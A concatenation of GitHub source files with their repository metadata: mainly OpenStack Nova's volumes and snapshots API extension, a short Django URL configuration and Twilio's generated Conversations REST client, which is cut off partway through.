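#   >>> parse_nation("@@testlandia@@ endorsed @@maxtopia@@.")
#   ['testlandia', 'maxtopia']
#   >>> parse_region("Something happened in %%the_pacific%%.")
#   ['the_pacific']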
| {
"content_hash": "b1958bd51c46a076d488e772dab2a46d",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 59,
"avg_line_length": 24.5625,
"alnum_prop": 0.6412213740458015,
"repo_name": "Dolphman/pynationstates",
"id": "3625325b6d4e462dc7dd2fce13391b1ea3e9b250",
"size": "393",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "utility/happeningsparser.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "67099"
}
],
"symlink_target": ""
} |
"""The volumes extension."""
from oslo_utils import strutils
from webob import exc
from nova.api.openstack import common
from nova.api.openstack.compute.schemas import volumes as volumes_schema
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova.api import validation
from nova import compute
from nova import exception
from nova.i18n import _
from nova import objects
from nova import volume
ALIAS = "os-volumes"
authorize = extensions.os_compute_authorizer(ALIAS)
authorize_attach = extensions.os_compute_authorizer('os-volumes-attachments')
def _translate_volume_detail_view(context, vol):
"""Maps keys for volumes details view."""
d = _translate_volume_summary_view(context, vol)
# No additional data / lookups at the moment
return d
def _translate_volume_summary_view(context, vol):
"""Maps keys for volumes summary view."""
d = {}
d['id'] = vol['id']
d['status'] = vol['status']
d['size'] = vol['size']
d['availabilityZone'] = vol['availability_zone']
d['createdAt'] = vol['created_at']
if vol['attach_status'] == 'attached':
d['attachments'] = [_translate_attachment_detail_view(vol['id'],
vol['instance_uuid'],
vol['mountpoint'])]
else:
d['attachments'] = [{}]
d['displayName'] = vol['display_name']
d['displayDescription'] = vol['display_description']
if vol['volume_type_id'] and vol.get('volume_type'):
d['volumeType'] = vol['volume_type']['name']
else:
d['volumeType'] = vol['volume_type_id']
d['snapshotId'] = vol['snapshot_id']
if vol.get('volume_metadata'):
d['metadata'] = vol.get('volume_metadata')
else:
d['metadata'] = {}
return d
class VolumeController(wsgi.Controller):
"""The Volumes API controller for the OpenStack API."""
def __init__(self):
self.volume_api = volume.API()
super(VolumeController, self).__init__()
@extensions.expected_errors(404)
def show(self, req, id):
"""Return data about the given volume."""
context = req.environ['nova.context']
authorize(context)
try:
vol = self.volume_api.get(context, id)
except exception.VolumeNotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
return {'volume': _translate_volume_detail_view(context, vol)}
@wsgi.response(202)
@extensions.expected_errors(404)
def delete(self, req, id):
"""Delete a volume."""
context = req.environ['nova.context']
authorize(context)
try:
self.volume_api.delete(context, id)
except exception.VolumeNotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
@extensions.expected_errors(())
def index(self, req):
"""Returns a summary list of volumes."""
return self._items(req, entity_maker=_translate_volume_summary_view)
@extensions.expected_errors(())
def detail(self, req):
"""Returns a detailed list of volumes."""
return self._items(req, entity_maker=_translate_volume_detail_view)
def _items(self, req, entity_maker):
"""Returns a list of volumes, transformed through entity_maker."""
context = req.environ['nova.context']
authorize(context)
volumes = self.volume_api.get_all(context)
limited_list = common.limited(volumes, req)
res = [entity_maker(context, vol) for vol in limited_list]
return {'volumes': res}
@extensions.expected_errors((400, 404))
@validation.schema(volumes_schema.create)
def create(self, req, body):
"""Creates a new volume."""
context = req.environ['nova.context']
authorize(context)
vol = body['volume']
vol_type = vol.get('volume_type')
metadata = vol.get('metadata')
snapshot_id = vol.get('snapshot_id', None)
if snapshot_id is not None:
try:
snapshot = self.volume_api.get_snapshot(context, snapshot_id)
except exception.SnapshotNotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
else:
snapshot = None
size = vol.get('size', None)
if size is None and snapshot is not None:
size = snapshot['volume_size']
availability_zone = vol.get('availability_zone')
try:
new_volume = self.volume_api.create(
context,
size,
vol.get('display_name'),
vol.get('display_description'),
snapshot=snapshot,
volume_type=vol_type,
metadata=metadata,
availability_zone=availability_zone
)
except exception.InvalidInput as err:
raise exc.HTTPBadRequest(explanation=err.format_message())
# TODO(vish): Instance should be None at db layer instead of
# trying to lazy load, but for now we turn it into
# a dict to avoid an error.
retval = _translate_volume_detail_view(context, dict(new_volume))
result = {'volume': retval}
location = '%s/%s' % (req.url, new_volume['id'])
return wsgi.ResponseObject(result, headers=dict(location=location))
def _translate_attachment_detail_view(volume_id, instance_uuid, mountpoint):
"""Maps keys for attachment details view."""
d = _translate_attachment_summary_view(volume_id,
instance_uuid,
mountpoint)
# No additional data / lookups at the moment
return d
def _translate_attachment_summary_view(volume_id, instance_uuid, mountpoint):
"""Maps keys for attachment summary view."""
d = {}
# NOTE(justinsb): We use the volume id as the id of the attachment object
d['id'] = volume_id
d['volumeId'] = volume_id
d['serverId'] = instance_uuid
if mountpoint:
d['device'] = mountpoint
return d
class VolumeAttachmentController(wsgi.Controller):
"""The volume attachment API controller for the OpenStack API.
A child resource of the server. Note that we use the volume id
as the ID of the attachment (though this is not guaranteed externally)
"""
def __init__(self):
self.compute_api = compute.API(skip_policy_check=True)
self.volume_api = volume.API()
super(VolumeAttachmentController, self).__init__()
@extensions.expected_errors(404)
def index(self, req, server_id):
"""Returns the list of volume attachments for a given instance."""
context = req.environ['nova.context']
authorize_attach(context, action='index')
return self._items(req, server_id,
entity_maker=_translate_attachment_summary_view)
@extensions.expected_errors(404)
def show(self, req, server_id, id):
"""Return data about the given volume attachment."""
context = req.environ['nova.context']
authorize(context)
authorize_attach(context, action='show')
volume_id = id
instance = common.get_instance(self.compute_api, context, server_id)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
if not bdms:
msg = _("Instance %s is not attached.") % server_id
raise exc.HTTPNotFound(explanation=msg)
assigned_mountpoint = None
for bdm in bdms:
if bdm.volume_id == volume_id:
assigned_mountpoint = bdm.device_name
break
if assigned_mountpoint is None:
msg = _("volume_id not found: %s") % volume_id
raise exc.HTTPNotFound(explanation=msg)
return {'volumeAttachment': _translate_attachment_detail_view(
volume_id,
instance.uuid,
assigned_mountpoint)}
@extensions.expected_errors((400, 404, 409))
@validation.schema(volumes_schema.create_volume_attachment)
def create(self, req, server_id, body):
"""Attach a volume to an instance."""
context = req.environ['nova.context']
authorize(context)
authorize_attach(context, action='create')
volume_id = body['volumeAttachment']['volumeId']
device = body['volumeAttachment'].get('device')
instance = common.get_instance(self.compute_api, context, server_id)
try:
device = self.compute_api.attach_volume(context, instance,
volume_id, device)
except exception.VolumeNotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'attach_volume', server_id)
except (exception.InvalidVolume,
exception.InvalidDevicePath) as e:
raise exc.HTTPBadRequest(explanation=e.format_message())
# The attach is async
attachment = {}
attachment['id'] = volume_id
attachment['serverId'] = server_id
attachment['volumeId'] = volume_id
attachment['device'] = device
# NOTE(justinsb): And now, we have a problem...
# The attach is async, so there's a window in which we don't see
# the attachment (until the attachment completes). We could also
# get problems with concurrent requests. I think we need an
# attachment state, and to write to the DB here, but that's a bigger
# change.
# For now, we'll probably have to rely on libraries being smart
# TODO(justinsb): How do I return "accepted" here?
return {'volumeAttachment': attachment}
@wsgi.response(202)
@extensions.expected_errors((400, 404, 409))
@validation.schema(volumes_schema.update_volume_attachment)
def update(self, req, server_id, id, body):
context = req.environ['nova.context']
authorize(context)
authorize_attach(context, action='update')
old_volume_id = id
try:
old_volume = self.volume_api.get(context, old_volume_id)
new_volume_id = body['volumeAttachment']['volumeId']
new_volume = self.volume_api.get(context, new_volume_id)
except exception.VolumeNotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
instance = common.get_instance(self.compute_api, context, server_id)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
found = False
try:
for bdm in bdms:
if bdm.volume_id != old_volume_id:
continue
try:
self.compute_api.swap_volume(context, instance, old_volume,
new_volume)
found = True
break
except exception.VolumeUnattached:
# The volume is not attached. Treat it as NotFound
# by falling through.
pass
except exception.InvalidVolume as e:
raise exc.HTTPBadRequest(explanation=e.format_message())
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'swap_volume', server_id)
if not found:
msg = _("The volume was either invalid or not attached to the "
"instance.")
raise exc.HTTPNotFound(explanation=msg)
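    # Illustrative sketch (not part of the original module): a swap request
    # handled by update() above; volume IDs are placeholders and the route
    # assumes the same os-volume_attachments parent resource.
    #
    #   PUT /servers/<server_id>/os-volume_attachments/<old_volume_id>
    #   {"volumeAttachment": {"volumeId": "<new_volume_id>"}}
    #
    # On success a 202 Accepted is returned with no body, per the
    # wsgi.response(202) decorator on update().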
@wsgi.response(202)
@extensions.expected_errors((400, 403, 404, 409))
def delete(self, req, server_id, id):
"""Detach a volume from an instance."""
context = req.environ['nova.context']
authorize(context)
authorize_attach(context, action='delete')
volume_id = id
instance = common.get_instance(self.compute_api, context, server_id)
try:
volume = self.volume_api.get(context, volume_id)
except exception.VolumeNotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
if not bdms:
msg = _("Instance %s is not attached.") % server_id
raise exc.HTTPNotFound(explanation=msg)
found = False
try:
for bdm in bdms:
if bdm.volume_id != volume_id:
continue
if bdm.is_root:
msg = _("Can't detach root device volume")
raise exc.HTTPForbidden(explanation=msg)
try:
self.compute_api.detach_volume(context, instance, volume)
found = True
break
except exception.VolumeUnattached:
# The volume is not attached. Treat it as NotFound
# by falling through.
pass
except exception.InvalidVolume as e:
raise exc.HTTPBadRequest(explanation=e.format_message())
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'detach_volume', server_id)
if not found:
msg = _("volume_id not found: %s") % volume_id
raise exc.HTTPNotFound(explanation=msg)
def _items(self, req, server_id, entity_maker):
"""Returns a list of attachments, transformed through entity_maker."""
context = req.environ['nova.context']
authorize(context)
instance = common.get_instance(self.compute_api, context, server_id)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
limited_list = common.limited(bdms, req)
results = []
for bdm in limited_list:
if bdm.volume_id:
results.append(entity_maker(bdm.volume_id,
bdm.instance_uuid,
bdm.device_name))
return {'volumeAttachments': results}
def _translate_snapshot_detail_view(context, vol):
"""Maps keys for snapshots details view."""
d = _translate_snapshot_summary_view(context, vol)
# NOTE(gagupta): No additional data / lookups at the moment
return d
def _translate_snapshot_summary_view(context, vol):
"""Maps keys for snapshots summary view."""
d = {}
d['id'] = vol['id']
d['volumeId'] = vol['volume_id']
d['status'] = vol['status']
# NOTE(gagupta): We map volume_size as the snapshot size
d['size'] = vol['volume_size']
d['createdAt'] = vol['created_at']
d['displayName'] = vol['display_name']
d['displayDescription'] = vol['display_description']
return d
class SnapshotController(wsgi.Controller):
"""The Snapshots API controller for the OpenStack API."""
def __init__(self):
self.volume_api = volume.API()
super(SnapshotController, self).__init__()
@extensions.expected_errors(404)
def show(self, req, id):
"""Return data about the given snapshot."""
context = req.environ['nova.context']
authorize(context)
try:
vol = self.volume_api.get_snapshot(context, id)
except exception.SnapshotNotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
return {'snapshot': _translate_snapshot_detail_view(context, vol)}
@wsgi.response(202)
@extensions.expected_errors(404)
def delete(self, req, id):
"""Delete a snapshot."""
context = req.environ['nova.context']
authorize(context)
try:
self.volume_api.delete_snapshot(context, id)
except exception.SnapshotNotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
@extensions.expected_errors(())
def index(self, req):
"""Returns a summary list of snapshots."""
return self._items(req, entity_maker=_translate_snapshot_summary_view)
@extensions.expected_errors(())
def detail(self, req):
"""Returns a detailed list of snapshots."""
return self._items(req, entity_maker=_translate_snapshot_detail_view)
def _items(self, req, entity_maker):
"""Returns a list of snapshots, transformed through entity_maker."""
context = req.environ['nova.context']
authorize(context)
snapshots = self.volume_api.get_all_snapshots(context)
limited_list = common.limited(snapshots, req)
res = [entity_maker(context, snapshot) for snapshot in limited_list]
return {'snapshots': res}
@extensions.expected_errors(400)
@validation.schema(volumes_schema.snapshot_create)
def create(self, req, body):
"""Creates a new snapshot."""
context = req.environ['nova.context']
authorize(context)
snapshot = body['snapshot']
volume_id = snapshot['volume_id']
force = snapshot.get('force', False)
force = strutils.bool_from_string(force, strict=True)
if force:
create_func = self.volume_api.create_snapshot_force
else:
create_func = self.volume_api.create_snapshot
new_snapshot = create_func(context, volume_id,
snapshot.get('display_name'),
snapshot.get('display_description'))
retval = _translate_snapshot_detail_view(context, new_snapshot)
return {'snapshot': retval}
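    # Illustrative sketch (not part of the original module): a snapshot
    # creation body accepted by create() above. Field names follow the
    # snapshot_create schema referenced in the decorator; the volume_id is
    # a placeholder.
    #
    #   POST /os-snapshots
    #   {"snapshot": {"volume_id": "521752a6-0000",
    #                 "display_name": "backup-1",
    #                 "display_description": "nightly backup",
    #                 "force": false}}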
class Volumes(extensions.V21APIExtensionBase):
"""Volumes support."""
name = "Volumes"
alias = ALIAS
version = 1
def get_resources(self):
resources = []
res = extensions.ResourceExtension(
ALIAS, VolumeController(), collection_actions={'detail': 'GET'})
resources.append(res)
res = extensions.ResourceExtension('os-volumes_boot',
inherits='servers')
resources.append(res)
res = extensions.ResourceExtension('os-volume_attachments',
VolumeAttachmentController(),
parent=dict(
member_name='server',
collection_name='servers'))
resources.append(res)
res = extensions.ResourceExtension(
'os-snapshots', SnapshotController(),
collection_actions={'detail': 'GET'})
resources.append(res)
return resources
def get_controller_extensions(self):
return []
| {
"content_hash": "418b136ca06af492c01d132fa5109f79",
"timestamp": "",
"source": "github",
"line_count": 551,
"max_line_length": 79,
"avg_line_length": 35.16515426497278,
"alnum_prop": 0.5983175061932288,
"repo_name": "shail2810/nova",
"id": "83137acec6af55b27bab4afdeb31db7a46cc6479",
"size": "20012",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "nova/api/openstack/compute/volumes.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "16525734"
},
{
"name": "Shell",
"bytes": "20716"
},
{
"name": "Smarty",
"bytes": "285480"
}
],
"symlink_target": ""
} |
from django.conf.urls.defaults import patterns, url
urlpatterns = patterns('myclient.apps.api.views',
(r'^date_joined/?$', 'date_joined'),
(r'^last_login/?$', 'last_login'),
(r'^email/?$', 'email'),
(r'^remote/date_joined/?$', 'remote', {'target_method': 'date_joined'}),
(r'^remote/last_login/?$', 'remote', {'target_method': 'last_login'}),
(r'^remote/email/?$', 'remote', {'target_method': 'email'}),
)
| {
"content_hash": "400b8cdf636e83891edc14f191c00884",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 79,
"avg_line_length": 48.4,
"alnum_prop": 0.5289256198347108,
"repo_name": "pingali/aadhaar-oauth2-server",
"id": "8399a72b8e1f582e448b687b2374dd15bcd01c89",
"size": "507",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "myclient/apps/api/urls.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "54980"
},
{
"name": "Python",
"bytes": "78518"
}
],
"symlink_target": ""
} |
r"""
This code was generated by
   \ / _    _  _|   _  _
    | (_)\/(_)(_|\/| |(/_  v1.0.0
         /       /
"""
from twilio.base import deserialize
from twilio.base import serialize
from twilio.base import values
from twilio.base.instance_context import InstanceContext
from twilio.base.instance_resource import InstanceResource
from twilio.base.list_resource import ListResource
from twilio.base.page import Page
from twilio.rest.conversations.v1.service.conversation.message import MessageList
from twilio.rest.conversations.v1.service.conversation.participant import ParticipantList
from twilio.rest.conversations.v1.service.conversation.webhook import WebhookList
class ConversationList(ListResource):
def __init__(self, version, chat_service_sid):
"""
Initialize the ConversationList
:param Version version: Version that contains the resource
:param chat_service_sid: The unique ID of the Conversation Service this conversation belongs to.
:returns: twilio.rest.conversations.v1.service.conversation.ConversationList
:rtype: twilio.rest.conversations.v1.service.conversation.ConversationList
"""
super(ConversationList, self).__init__(version)
# Path Solution
self._solution = {'chat_service_sid': chat_service_sid, }
self._uri = '/Services/{chat_service_sid}/Conversations'.format(**self._solution)
def create(self, friendly_name=values.unset, unique_name=values.unset,
attributes=values.unset, messaging_service_sid=values.unset,
date_created=values.unset, date_updated=values.unset,
state=values.unset, timers_inactive=values.unset,
timers_closed=values.unset, x_twilio_webhook_enabled=values.unset):
"""
Create the ConversationInstance
:param unicode friendly_name: The human-readable name of this conversation.
:param unicode unique_name: An application-defined string that uniquely identifies the resource
:param unicode attributes: An optional string metadata field you can use to store any data you wish.
:param unicode messaging_service_sid: The unique ID of the Messaging Service this conversation belongs to.
:param datetime date_created: The date that this resource was created.
:param datetime date_updated: The date that this resource was last updated.
:param ConversationInstance.State state: Current state of this conversation.
:param unicode timers_inactive: ISO8601 duration when conversation will be switched to `inactive` state.
:param unicode timers_closed: ISO8601 duration when conversation will be switched to `closed` state.
:param ConversationInstance.WebhookEnabledType x_twilio_webhook_enabled: The X-Twilio-Webhook-Enabled HTTP request header
:returns: The created ConversationInstance
:rtype: twilio.rest.conversations.v1.service.conversation.ConversationInstance
"""
data = values.of({
'FriendlyName': friendly_name,
'UniqueName': unique_name,
'Attributes': attributes,
'MessagingServiceSid': messaging_service_sid,
'DateCreated': serialize.iso8601_datetime(date_created),
'DateUpdated': serialize.iso8601_datetime(date_updated),
'State': state,
'Timers.Inactive': timers_inactive,
'Timers.Closed': timers_closed,
})
headers = values.of({'X-Twilio-Webhook-Enabled': x_twilio_webhook_enabled, })
payload = self._version.create(method='POST', uri=self._uri, data=data, headers=headers, )
return ConversationInstance(
self._version,
payload,
chat_service_sid=self._solution['chat_service_sid'],
)
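    # Illustrative sketch (not part of the generated module): creating a
    # conversation through this list resource via the top-level client,
    # assuming the standard twilio-python client layout. Credentials and
    # SIDs are placeholders.
    #
    #   from twilio.rest import Client
    #   client = Client('ACXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX', 'your_auth_token')
    #   conversation = client.conversations.v1 \
    #       .services('ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') \
    #       .conversations \
    #       .create(friendly_name='Support Room')
    #   print(conversation.sid)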
def stream(self, limit=None, page_size=None):
"""
Streams ConversationInstance records from the API as a generator stream.
This operation lazily loads records as efficiently as possible until the limit
is reached.
The results are returned as a generator, so this operation is memory efficient.
:param int limit: Upper limit for the number of records to return. stream()
guarantees to never return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, stream() will attempt to read the
limit with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.conversations.v1.service.conversation.ConversationInstance]
"""
limits = self._version.read_limits(limit, page_size)
page = self.page(page_size=limits['page_size'], )
return self._version.stream(page, limits['limit'])
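    # Illustrative sketch: paging behaviour of stream() above. With
    # limit=500 and no page_size, read_limits() picks an efficient page
    # size of min(500, 1000), so at most 500 records are requested per page
    # and the generator stops after 500 instances. `conversations_list` is
    # a placeholder for a ConversationList instance.
    #
    #   for conversation in conversations_list.stream(limit=500):
    #       print(conversation.sid)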
def list(self, limit=None, page_size=None):
"""
Lists ConversationInstance records from the API as a list.
Unlike stream(), this operation is eager and will load `limit` records into
memory before returning.
:param int limit: Upper limit for the number of records to return. list() guarantees
never to return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, list() will attempt to read the limit
with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.conversations.v1.service.conversation.ConversationInstance]
"""
return list(self.stream(limit=limit, page_size=page_size, ))
def page(self, page_token=values.unset, page_number=values.unset,
page_size=values.unset):
"""
Retrieve a single page of ConversationInstance records from the API.
Request is executed immediately
:param str page_token: PageToken provided by the API
:param int page_number: Page Number, this value is simply for client state
:param int page_size: Number of records to return, defaults to 50
:returns: Page of ConversationInstance
:rtype: twilio.rest.conversations.v1.service.conversation.ConversationPage
"""
data = values.of({'PageToken': page_token, 'Page': page_number, 'PageSize': page_size, })
response = self._version.page(method='GET', uri=self._uri, params=data, )
return ConversationPage(self._version, response, self._solution)
def get_page(self, target_url):
"""
Retrieve a specific page of ConversationInstance records from the API.
Request is executed immediately
:param str target_url: API-generated URL for the requested results page
:returns: Page of ConversationInstance
:rtype: twilio.rest.conversations.v1.service.conversation.ConversationPage
"""
response = self._version.domain.twilio.request(
'GET',
target_url,
)
return ConversationPage(self._version, response, self._solution)
def get(self, sid):
"""
Constructs a ConversationContext
:param sid: A 34 character string that uniquely identifies this resource.
:returns: twilio.rest.conversations.v1.service.conversation.ConversationContext
:rtype: twilio.rest.conversations.v1.service.conversation.ConversationContext
"""
return ConversationContext(
self._version,
chat_service_sid=self._solution['chat_service_sid'],
sid=sid,
)
def __call__(self, sid):
"""
Constructs a ConversationContext
:param sid: A 34 character string that uniquely identifies this resource.
:returns: twilio.rest.conversations.v1.service.conversation.ConversationContext
:rtype: twilio.rest.conversations.v1.service.conversation.ConversationContext
"""
return ConversationContext(
self._version,
chat_service_sid=self._solution['chat_service_sid'],
sid=sid,
)
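    # Illustrative sketch: both get() and __call__ above only build a
    # ConversationContext; no HTTP request is issued until an action such
    # as fetch(), update() or delete() is invoked on it. The SID is a
    # placeholder.
    #
    #   context = conversations_list.get('CHXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
    #   conversation = context.fetch()   # GET happens here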
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Conversations.V1.ConversationList>'
class ConversationPage(Page):
def __init__(self, version, response, solution):
"""
Initialize the ConversationPage
:param Version version: Version that contains the resource
:param Response response: Response from the API
:param chat_service_sid: The unique ID of the Conversation Service this conversation belongs to.
:returns: twilio.rest.conversations.v1.service.conversation.ConversationPage
:rtype: twilio.rest.conversations.v1.service.conversation.ConversationPage
"""
super(ConversationPage, self).__init__(version, response)
# Path Solution
self._solution = solution
def get_instance(self, payload):
"""
Build an instance of ConversationInstance
:param dict payload: Payload response from the API
:returns: twilio.rest.conversations.v1.service.conversation.ConversationInstance
:rtype: twilio.rest.conversations.v1.service.conversation.ConversationInstance
"""
return ConversationInstance(
self._version,
payload,
chat_service_sid=self._solution['chat_service_sid'],
)
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Conversations.V1.ConversationPage>'
class ConversationContext(InstanceContext):
def __init__(self, version, chat_service_sid, sid):
"""
Initialize the ConversationContext
:param Version version: Version that contains the resource
:param chat_service_sid: The SID of the Conversation Service that the resource is associated with.
:param sid: A 34 character string that uniquely identifies this resource.
:returns: twilio.rest.conversations.v1.service.conversation.ConversationContext
:rtype: twilio.rest.conversations.v1.service.conversation.ConversationContext
"""
super(ConversationContext, self).__init__(version)
# Path Solution
self._solution = {'chat_service_sid': chat_service_sid, 'sid': sid, }
self._uri = '/Services/{chat_service_sid}/Conversations/{sid}'.format(**self._solution)
# Dependents
self._participants = None
self._messages = None
self._webhooks = None
def update(self, friendly_name=values.unset, date_created=values.unset,
date_updated=values.unset, attributes=values.unset,
messaging_service_sid=values.unset, state=values.unset,
timers_inactive=values.unset, timers_closed=values.unset,
unique_name=values.unset, x_twilio_webhook_enabled=values.unset):
"""
Update the ConversationInstance
:param unicode friendly_name: The human-readable name of this conversation.
:param datetime date_created: The date that this resource was created.
:param datetime date_updated: The date that this resource was last updated.
:param unicode attributes: An optional string metadata field you can use to store any data you wish.
:param unicode messaging_service_sid: The unique ID of the Messaging Service this conversation belongs to.
:param ConversationInstance.State state: Current state of this conversation.
:param unicode timers_inactive: ISO8601 duration when conversation will be switched to `inactive` state.
:param unicode timers_closed: ISO8601 duration when conversation will be switched to `closed` state.
:param unicode unique_name: An application-defined string that uniquely identifies the resource
:param ConversationInstance.WebhookEnabledType x_twilio_webhook_enabled: The X-Twilio-Webhook-Enabled HTTP request header
:returns: The updated ConversationInstance
:rtype: twilio.rest.conversations.v1.service.conversation.ConversationInstance
"""
data = values.of({
'FriendlyName': friendly_name,
'DateCreated': serialize.iso8601_datetime(date_created),
'DateUpdated': serialize.iso8601_datetime(date_updated),
'Attributes': attributes,
'MessagingServiceSid': messaging_service_sid,
'State': state,
'Timers.Inactive': timers_inactive,
'Timers.Closed': timers_closed,
'UniqueName': unique_name,
})
headers = values.of({'X-Twilio-Webhook-Enabled': x_twilio_webhook_enabled, })
payload = self._version.update(method='POST', uri=self._uri, data=data, headers=headers, )
return ConversationInstance(
self._version,
payload,
chat_service_sid=self._solution['chat_service_sid'],
sid=self._solution['sid'],
)
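    # Illustrative sketch: closing a conversation and adjusting its timers
    # through update() above, assuming `context` is a ConversationContext
    # obtained as shown earlier. Values are placeholders.
    #
    #   updated = context.update(state='closed',
    #                            timers_inactive='PT1H',
    #                            timers_closed='P30D')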
def delete(self, x_twilio_webhook_enabled=values.unset):
"""
Deletes the ConversationInstance
:param ConversationInstance.WebhookEnabledType x_twilio_webhook_enabled: The X-Twilio-Webhook-Enabled HTTP request header
:returns: True if delete succeeds, False otherwise
:rtype: bool
"""
headers = values.of({'X-Twilio-Webhook-Enabled': x_twilio_webhook_enabled, })
return self._version.delete(method='DELETE', uri=self._uri, headers=headers, )
def fetch(self):
"""
Fetch the ConversationInstance
:returns: The fetched ConversationInstance
:rtype: twilio.rest.conversations.v1.service.conversation.ConversationInstance
"""
payload = self._version.fetch(method='GET', uri=self._uri, )
return ConversationInstance(
self._version,
payload,
chat_service_sid=self._solution['chat_service_sid'],
sid=self._solution['sid'],
)
@property
def participants(self):
"""
Access the participants
:returns: twilio.rest.conversations.v1.service.conversation.participant.ParticipantList
:rtype: twilio.rest.conversations.v1.service.conversation.participant.ParticipantList
"""
if self._participants is None:
self._participants = ParticipantList(
self._version,
chat_service_sid=self._solution['chat_service_sid'],
conversation_sid=self._solution['sid'],
)
return self._participants
@property
def messages(self):
"""
Access the messages
:returns: twilio.rest.conversations.v1.service.conversation.message.MessageList
:rtype: twilio.rest.conversations.v1.service.conversation.message.MessageList
"""
if self._messages is None:
self._messages = MessageList(
self._version,
chat_service_sid=self._solution['chat_service_sid'],
conversation_sid=self._solution['sid'],
)
return self._messages
@property
def webhooks(self):
"""
Access the webhooks
:returns: twilio.rest.conversations.v1.service.conversation.webhook.WebhookList
:rtype: twilio.rest.conversations.v1.service.conversation.webhook.WebhookList
"""
if self._webhooks is None:
self._webhooks = WebhookList(
self._version,
chat_service_sid=self._solution['chat_service_sid'],
conversation_sid=self._solution['sid'],
)
return self._webhooks
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.Conversations.V1.ConversationContext {}>'.format(context)
class ConversationInstance(InstanceResource):
class WebhookEnabledType(object):
TRUE = "true"
FALSE = "false"
class State(object):
INACTIVE = "inactive"
ACTIVE = "active"
CLOSED = "closed"
def __init__(self, version, payload, chat_service_sid, sid=None):
"""
Initialize the ConversationInstance
:returns: twilio.rest.conversations.v1.service.conversation.ConversationInstance
:rtype: twilio.rest.conversations.v1.service.conversation.ConversationInstance
"""
super(ConversationInstance, self).__init__(version)
# Marshaled Properties
self._properties = {
'account_sid': payload.get('account_sid'),
'chat_service_sid': payload.get('chat_service_sid'),
'messaging_service_sid': payload.get('messaging_service_sid'),
'sid': payload.get('sid'),
'friendly_name': payload.get('friendly_name'),
'unique_name': payload.get('unique_name'),
'attributes': payload.get('attributes'),
'state': payload.get('state'),
'date_created': deserialize.iso8601_datetime(payload.get('date_created')),
'date_updated': deserialize.iso8601_datetime(payload.get('date_updated')),
'timers': payload.get('timers'),
'url': payload.get('url'),
'links': payload.get('links'),
'bindings': payload.get('bindings'),
}
# Context
self._context = None
self._solution = {'chat_service_sid': chat_service_sid, 'sid': sid or self._properties['sid'], }
@property
def _proxy(self):
"""
Generate an instance context for the instance, the context is capable of
performing various actions. All instance actions are proxied to the context
:returns: ConversationContext for this ConversationInstance
:rtype: twilio.rest.conversations.v1.service.conversation.ConversationContext
"""
if self._context is None:
self._context = ConversationContext(
self._version,
chat_service_sid=self._solution['chat_service_sid'],
sid=self._solution['sid'],
)
return self._context
@property
def account_sid(self):
"""
:returns: The unique ID of the Account responsible for this conversation.
:rtype: unicode
"""
return self._properties['account_sid']
@property
def chat_service_sid(self):
"""
:returns: The unique ID of the Conversation Service this conversation belongs to.
:rtype: unicode
"""
return self._properties['chat_service_sid']
@property
def messaging_service_sid(self):
"""
:returns: The unique ID of the Messaging Service this conversation belongs to.
:rtype: unicode
"""
return self._properties['messaging_service_sid']
@property
def sid(self):
"""
:returns: A 34 character string that uniquely identifies this resource.
:rtype: unicode
"""
return self._properties['sid']
@property
def friendly_name(self):
"""
:returns: The human-readable name of this conversation.
:rtype: unicode
"""
return self._properties['friendly_name']
@property
def unique_name(self):
"""
:returns: An application-defined string that uniquely identifies the resource
:rtype: unicode
"""
return self._properties['unique_name']
@property
def attributes(self):
"""
:returns: An optional string metadata field you can use to store any data you wish.
:rtype: unicode
"""
return self._properties['attributes']
@property
def state(self):
"""
:returns: Current state of this conversation.
:rtype: ConversationInstance.State
"""
return self._properties['state']
@property
def date_created(self):
"""
:returns: The date that this resource was created.
:rtype: datetime
"""
return self._properties['date_created']
@property
def date_updated(self):
"""
:returns: The date that this resource was last updated.
